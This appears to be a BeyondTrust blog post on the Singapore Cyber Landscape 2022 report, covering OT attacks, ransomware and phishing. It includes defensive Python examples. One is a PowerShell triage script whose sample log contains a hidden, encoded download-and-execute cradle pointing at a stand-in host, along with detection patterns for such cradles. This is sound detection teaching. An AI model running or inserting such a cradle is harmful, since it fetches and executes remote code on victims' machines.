Cyber threats such as ransomware, attacks on operational technology (OT) and manufacturing, and phishing headlined the recently released Singapore Cyber Landscape 2022 report, published by the Cyber Security Agency (CSA) of Singapore.
The annual report focuses on:
- The key trends CSA is seeing in the Singaporean cyber landscape
- Global trends that are likely to impact Singapore
- How the Singaporean government is helping the country’s businesses and citizens defend themselves against cyber threats.
This blog post will dig into the threats called out in the report and discuss how organizations can strengthen their cyber defenses and mitigate risks in relation to these threats. Let's take a look at the top three cyber challenges highlighted by the CSA report.
1. Operational Technology (OT) attacks are a national security concern
The growing impact of cyber threats on operational technology (OT) is highlighted as a key concern of CSA in the report.
OT systems interact with machinery and automated industrial applications that are often involved in the provision of essential services. Compromise of these systems could result in the complete or partial shutdown of important equipment, which could lead to physical damage, financial losses, disruption of essential services, and potential harm to human lives. This high potential for disruption and destruction has led OT systems to be regarded as a national security concern. Yet despite that priority, the number of threat vectors affecting OT systems is rapidly increasing, and digital transformation is playing a key part.
IIoT and the technological advancement of operational technologies
The CSA report highlights the new attack vectors being introduced by technological advances in OT systems, for example the Industrial Internet of Things (IIoT), which allow these systems to establish unsecured connections to the organization’s IT infrastructure without being governed by the IT security controls that apply elsewhere.
Traditionally, the key strategy for reducing risk to OT systems was to keep them separate from Internet-facing IT systems. Today, technological advances are making it difficult to keep OT systems off the internet, which exposes them to growing risk and drives the need for OT/IT convergence. From industrial equipment now monitored by IIoT to smart coffee makers connecting to the office Wi-Fi in the company lunchroom, the attack surface of OT organizations is rapidly expanding, and threat actors are taking notice.
A decade ago, we saw the impact of unsecured connections between IT and OT play out in the massive Target breach in the U.S. In that instance, an HVAC (heating, ventilation, and air conditioning) vendor’s systems had been compromised, and the vendor’s remote connection to the retailer’s systems for maintenance and monitoring eventually provided access to the point-of-sale terminals. The attackers went on to collect the credit card information of 40 million customers.
Remote access to OT systems
In recent years, many organizations have invested heavily in digital transformation initiatives, looking to improve customer experience while gaining benefits in productivity. A large part of these initiatives involved the provisioning of remote access to IT systems and OT systems, as well as a convergence between the two environments.
Whether for employees or third-party suppliers, remote access has often been granted via VPN (virtual private network). The problem is that, in many cases, a VPN falls short of the principle of least privilege, a key part of a zero trust security posture. VPNs often provide all-or-nothing access, with little ability to see who did what and when.
In the past, a third-party employee coming on-site to access IT or OT would be accompanied by another employee, and perhaps even monitored while they worked on sensitive systems. A VPN provides the equivalent of picking up a visitor’s badge at reception, using it to gain access to the entire system, sensitive or not, and then simply checking out when done.
How are organizations defending their OT environments?
In response to the added risk introduced by digital transformation and remote access initiatives, many organizations are adopting a zero trust approach to cybersecurity. Privileged Access Management (PAM), and in particular solutions such as Privileged Remote Access that give organizations granular control over who has access to which parts of their systems, together with a full audit trail, can help, whether for IT or OT connections.
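To make the contrast with all-or-nothing VPN access concrete, here is an added example of a default-deny remote access broker. It is not from the CSA report and is not BeyondTrust product code; the vendor identity, the OT host name, the port set and the maintenance window are all constructed values. A third party is granted reach to one named host, on named ports, only inside a time window, and every request, allowed or denied, is recorded with who, what, when and why.

```python
"""Scoped, time-bounded remote access with an audit trail.

Added illustration for this post; it is not BeyondTrust code and does not
model any particular product. It contrasts an all-or-nothing VPN with a
broker that grants a third party access only to named hosts and ports,
only within a maintenance window, and records every decision as an audit
event that answers "who did what, and when". All identities, hosts and
timestamps are constructed sample data.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import FrozenSet, List, Tuple


@dataclass(frozen=True)
class Grant:
    """One scoped, time-bounded permission for an external identity."""
    identity: str              # constructed, e.g. "hvac-vendor@example.test"
    target_host: str           # the single host this grant covers
    allowed_ports: FrozenSet[int]
    not_before: datetime
    not_after: datetime


@dataclass(frozen=True)
class AuditEvent:
    when: datetime
    identity: str
    target_host: str
    port: int
    decision: str              # "ALLOW" or "DENY"
    reason: str


class AccessBroker:
    """Default-deny policy engine: nothing is reachable without a matching grant."""

    def __init__(self, grants: List[Grant]) -> None:
        self._grants = list(grants)
        self.audit: List[AuditEvent] = []

    def authorize(self, identity: str, host: str, port: int, now: datetime) -> bool:
        decision, reason = "DENY", "no grant for this identity and host"
        for g in self._grants:
            if g.identity != identity or g.target_host != host:
                continue
            if port not in g.allowed_ports:
                reason = f"port {port} is outside the grant for {host}"
                continue
            if not (g.not_before <= now <= g.not_after):
                reason = "request is outside the grant's validity window"
                continue
            decision, reason = "ALLOW", "matching grant within its window"
            break
        # Every decision, allowed or denied, is recorded: who, what, when, why.
        self.audit.append(AuditEvent(now, identity, host, port, decision, reason))
        return decision == "ALLOW"


def run_demo() -> Tuple[List[str], List[str]]:
    """Replay constructed requests; return the decisions and the reasons logged."""
    start = datetime(2023, 7, 10, 9, 0, tzinfo=timezone.utc)
    # A four-hour maintenance window for one vendor, limited to one building
    # management host and to HTTPS and SSH on it (all constructed).
    vendor, bms_host = "hvac-vendor@example.test", "bms-01.ot.example.test"
    broker = AccessBroker([
        Grant(vendor, bms_host, frozenset({443, 22}), start, start + timedelta(hours=4)),
    ])
    requests = [
        (vendor, bms_host, 443, start + timedelta(minutes=5)),                  # in scope, in window
        (vendor, bms_host, 3389, start + timedelta(minutes=6)),                 # port not granted
        (vendor, "pos-01.corp.example.test", 443, start + timedelta(minutes=7)),  # other host
        (vendor, bms_host, 443, start + timedelta(hours=5)),                    # window has expired
    ]
    decisions = ["ALLOW" if broker.authorize(*r) else "DENY" for r in requests]
    reasons = [e.reason for e in broker.audit]
    return decisions, reasons


if __name__ == "__main__":
    for d, r in zip(*run_demo()):
        print(d, "-", r)
```

Only the first request succeeds; the other three are refused for a different reason each, and the audit list holds all four decisions, which is exactly the record a VPN session typically lacks.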
2. Ransomware poses a near-universal cyberthreat
Sometimes the impact of a cyberattack on operational technology is indirect. For example, the Colonial Pipeline ransomware attack led to the shutdown of the pipeline because the organization was unable to use its billing system. This brings us to the next topic: ransomware.
In 2022, the Singapore Cyber Emergency Response Team (SingCERT) received reports of 132 ransomware cases, and the CSA report calls out the manufacturing and retail sectors as particular targets for these attacks. It is important to note that this figure probably underrepresents the total number of ransomware incidents in 2022, since not every victim reports an attack. In fact, the CSA report cites an FBI estimate suggesting that only 20% of US ransomware victims reached out to law enforcement to report the attack.
Why are ransomware attacks so universally pervasive?
The CSA report lists a number of reasons for why ransomware attacks continue to dominate the threat landscape.
- Ransomware-as-a-service (RaaS) is becoming more sophisticated and more accessible. Now, anyone with enough money to buy such a service can launch an attack.
- As ransomware becomes a more established and profitable business model, ransomware groups, including the likes of LockBit, are becoming more professional, diversifying their portfolios (attack techniques) and adopting more aggressive negotiation tactics.
- Ransomware attacks have branched out from targeting Windows to include cloud environments and Linux systems. According to a Trend Micro statistic cited by the report, in 2022, there was an increase of over 600% in instances where Linux systems were targeted.
- Malware-free attacks are becoming more common. Also known as “Living off the Land” (LoTL) or fileless malware techniques, these attacks leverage legitimate system applications, such as PowerShell, to execute the attack.
- Infrastructure expansion and the expanded use of cloud, multicloud, remote work, bring your own device (BYOD), and other digital transformation initiatives have significantly increased exposure to vulnerabilities. The volume of shadow IT, human and machine identities, and privileges is higher and harder to manage than ever. Ransomware attackers have been quick to capitalize.
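The "living off the land" point above is where detection engineering earns its keep, because there is no malicious file to match. The following is an added example, not taken from the CSA report or from BeyondTrust, of how a defender triages PowerShell command lines in process-creation logs: it decodes an -EncodedCommand payload and scores the well-known indicators (encoded command, hidden window, execution-policy bypass, download cradle, Invoke-Expression, an Office application as parent). The key=value log records, the user names and the payload pointing at example.test are constructed for the example and are not real telemetry or real Windows event formatting.

```python
"""Triage of living-off-the-land PowerShell use in process-creation logs.

Added example for this post; it is not from the CSA report or BeyondTrust.
It applies the checks a detection engineer uses on PowerShell command lines:
encoded commands, hidden windows, execution-policy bypass, download cradles
and Invoke-Expression, plus an Office application as the parent process.
Each distinct indicator adds to a score; one or two mean "review", three
or more mean "alert". The log records below are constructed in a simple
key=value form that resembles, but is not, Windows event data.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional


def _encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample records; the second carries an encoded download cradle
# that points at a non-existent test host.
SAMPLE_LOG: List[str] = [
    "user=alice parent=explorer.exe cmd=powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "user=bob parent=WINWORD.EXE cmd=powershell.exe -w hidden -ep bypass -enc "
    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"),
    "user=carol parent=cmd.exe cmd=powershell.exe Get-Process | Sort-Object CPU",
    "user=dave parent=cmd.exe cmd=powershell.exe -ExecutionPolicy Bypass -File \\\\fs01\\it\\inventory.ps1",
]

# Indicators applied to the visible command line and to any decoded payload.
CMD_INDICATORS: Dict[str, "re.Pattern"] = {
    "encoded_command": re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I),
    "hidden_window": re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden", re.I),
    "execution_policy_bypass": re.compile(r"(?:^|\s)-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
RECORD_RE = re.compile(r"user=(\S+)\s+parent=(\S+)\s+cmd=(.*)$")


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = CMD_INDICATORS["encoded_command"].search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(line: str) -> Dict[str, object]:
    """Score one record; returns user, distinct hits, decoded payload, score and verdict."""
    m = RECORD_RE.match(line)
    if not m:
        return {"user": None, "hits": [], "decoded": None, "score": 0, "verdict": "unparsed"}
    user, parent, cmd = m.groups()
    decoded = decode_encoded_command(cmd)
    hits = set()
    # The same indicator set runs over the visible command line and the decoded payload.
    for text in (cmd, decoded or ""):
        for name, pattern in CMD_INDICATORS.items():
            if pattern.search(text):
                hits.add(name)
    if parent.upper() in OFFICE_PARENTS:
        hits.add("office_parent")
    score = len(hits)
    verdict = "alert" if score >= 3 else "review" if score >= 1 else "benign"
    return {"user": user, "hits": sorted(hits), "decoded": decoded, "score": score, "verdict": verdict}


def triage(lines: List[str]) -> List[Dict[str, object]]:
    return [analyze(line) for line in lines]


if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(r["verdict"], r["user"], r["hits"])
```

The two ordinary script launches score zero, the Word-spawned encoded cradle trips all six indicators, and the `-ExecutionPolicy Bypass` run of an inventory script lands in "review" rather than "alert", which is the graded output an analyst wants: one indicator alone is common in legitimate administration, while several together almost never are.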
How can organizations protect themselves from ransomware?
Through a combination of privilege management (eliminating unnecessary privileges and removing admin rights) and application control (ensuring only legitimate, approved applications can execute or communicate), organizations can enforce the principle of least privilege to prevent attackers from exploiting native system tools. This can be done not just for Windows systems, but also for Mac, Unix, and Linux environments, providing comprehensive coverage for all organizations across their traditional, cloud, and hybrid environments.
3. Phishing scams remain the top scam type in Singapore
Phishing attacks increased substantially in Singapore last year, with SingCERT recording 8,500 attempts, an increase of over 170%, year on year.
The most spoofed industries, according to CSA, were banking and financial services; government, including the Inland Revenue Authority of Singapore; and logistics, where phishing attempts include notifications of missed deliveries or shipment issues.
Where it targets individuals, phishing is often used to collect information that allows identity theft or fraud to readily take place. However, phishing also impacts organizations, often representing the first step in a ransomware attack.
The goal is to obtain the credentials needed to access an organization’s network. From there, the attacker moves laterally as needed until they reach restricted information or systems, where they can spread malware, corrupt data, or steal data or identities.
How can you protect your organization from phishing scams?
There are basic best practices that can be followed to protect your organization from phishing attacks. However, given the ongoing success of phishing and the improving quality of the emails victims receive, especially with the use of generative AI, even the best-trained employees may slip up from time to time. It is important to provide additional layers of defense, including the removal of admin privileges on endpoints, to prevent attackers from gaining access to sensitive data and systems, and application control, to block the execution of malicious payloads. Both of these strategies deny phishers the access they need to escalate their attack.
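The two layers recommended here, and in the ransomware section above (removing admin rights, and application control that lets only approved applications execute), can be shown together in one policy decision. The following is an added example, not BeyondTrust code and not modelled on any specific product: a launch request from a standard user is refused if it asks for elevation, and otherwise the binary must be signed by a trusted publisher or match an approved SHA-256 before it may run, with unknown binaries in user-writable locations refused by default. The user names, paths, publisher name, file contents and the list of "user-writable" prefixes are all constructed assumptions for the example.

```python
"""Two endpoint layers against a phishing-delivered payload: no local admin
rights, and application control that only runs allowlisted binaries.

Added example for this post; it is not BeyondTrust code and models no
specific product. Allowlisting is by signing publisher or by SHA-256 of
the file contents, so a tampered copy of an approved tool no longer
matches; unknown binaries launched from user-writable locations (where
mail attachments and downloads land) are refused. All users, paths,
publishers and file contents are constructed sample data.
"""
import hashlib
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class LaunchRequest:
    user: str
    is_local_admin: bool        # False for staff once admin rights are removed
    path: str                   # Windows-style path, constructed
    contents: bytes             # file bytes, hashed at decision time
    publisher: Optional[str]    # signer subject if signed, else None
    requests_elevation: bool    # e.g. launched "as administrator"


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed allowlist: one trusted in-house signer and one approved unsigned tool.
TRUSTED_PUBLISHERS = {"CN=Example Corp IT Signing (constructed)"}
APPROVED_TOOL = b"MZ constructed approved inventory tool"
APPROVED_HASHES = {sha256_of(APPROVED_TOOL)}
# Locations treated as user-writable in this example (an assumption, not a standard list).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def evaluate(req: LaunchRequest) -> Tuple[str, str]:
    """Return (decision, reason) for one launch request."""
    # Layer 1: least privilege. A standard user cannot elevate at all, so a
    # payload that needs admin rights stops here whatever it is.
    if req.requests_elevation and not req.is_local_admin:
        return "DENY", "elevation requested by a standard user"
    # Layer 2: application control, default deny.
    if req.publisher in TRUSTED_PUBLISHERS:
        return "ALLOW", "signed by a trusted publisher"
    if sha256_of(req.contents) in APPROVED_HASHES:
        return "ALLOW", "hash is on the approved list"
    if req.path.lower().startswith(USER_WRITABLE_PREFIXES):
        return "DENY", "unapproved binary in a user-writable location"
    return "DENY", "not on the allowlist"


def run_demo() -> List[Tuple[str, str]]:
    """Evaluate constructed launch requests and return each decision with its reason."""
    tampered = APPROVED_TOOL + b"\x00"   # one byte appended: same name on disk, different hash
    signer = "CN=Example Corp IT Signing (constructed)"
    requests = [
        LaunchRequest("alice", False, "C:\\Program Files\\ExampleCorp\\inventory.exe", APPROVED_TOOL, None, False),
        LaunchRequest("bob", False, "C:\\Users\\bob\\Downloads\\invoice.pdf.exe", b"MZ constructed payload", None, False),
        LaunchRequest("carol", False, "C:\\Program Files\\ExampleCorp\\inventory.exe", tampered, None, False),
        LaunchRequest("dave", False, "C:\\Program Files\\ExampleCorp\\updater.exe", b"MZ constructed signed tool", signer, False),
        LaunchRequest("erin", False, "C:\\Program Files\\ExampleCorp\\inventory.exe", APPROVED_TOOL, None, True),
    ]
    return [evaluate(r) for r in requests]


if __name__ == "__main__":
    for decision, reason in run_demo():
        print(decision, "-", reason)
```

Note that the tampered copy of the approved tool is refused even though it sits in Program Files under the approved file name, because the allowlist keys on content hash rather than path or name. Per-application elevation, which lets a standard user run one approved tool with higher rights, is deliberately out of scope here.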
What is the CCoP (Cybersecurity Code of Practice) and how can it help?
Initially released in 2018 and later revised in July and December of 2022, the Cybersecurity Code of Practice for Critical Information Infrastructure designates a set of mandatory practices for the owners of Critical Information Infrastructure (CII), across the eleven CII sectors defined in the associated Cybersecurity Act 2018.
The CCoP was issued as a key effort in Singapore’s cybersecurity strategy, which seeks to actively defend Singapore’s cyberspace, simplify cybersecurity for end-users, and promote the development of international cyber norms and standards. Details of this strategy are outlined more extensively in the Singapore Cyber Landscape 2022 report.
The CCoP represents the first step in the first pillar of the cybersecurity strategy, which is focused on strengthening the resilience of digital infrastructure.
The main objectives of the latest edition of the CCoP are to:
- Adopt a threat-based approach to identify threat actors’ common tactics and techniques.
- Enhance agility in addressing emerging risks.
The owners of CII are required to conduct audits to ensure compliance with the Act. They are also required to provide, within 30 days of the finding, a remediation plan to the Singapore Commissioner of Cybersecurity.
What role can BeyondTrust play in the CCoP?
BeyondTrust’s Intelligent Identity and Access Security solutions are specifically designed to provide advanced Privileged Access Management, system hardening, and OT architecture and security, all key areas covered in the CCoP.
BeyondTrust’s Singapore team is already assisting a number of customers in meeting requirements of CCoP, including those mentioned above. If you would like to learn more about our work in this space, please reach out to our team.
Peter Vasey, Director, Marketing, APJ
With a passion for cybersecurity, Peter has spent more than 20 years in the IT industry helping to educate the market regarding solutions from the likes of Cisco, Symantec and LastPass. Peter joined BeyondTrust in 2021, responsible for APJ marketing, and is a member of the Australian Information Security Association (AISA).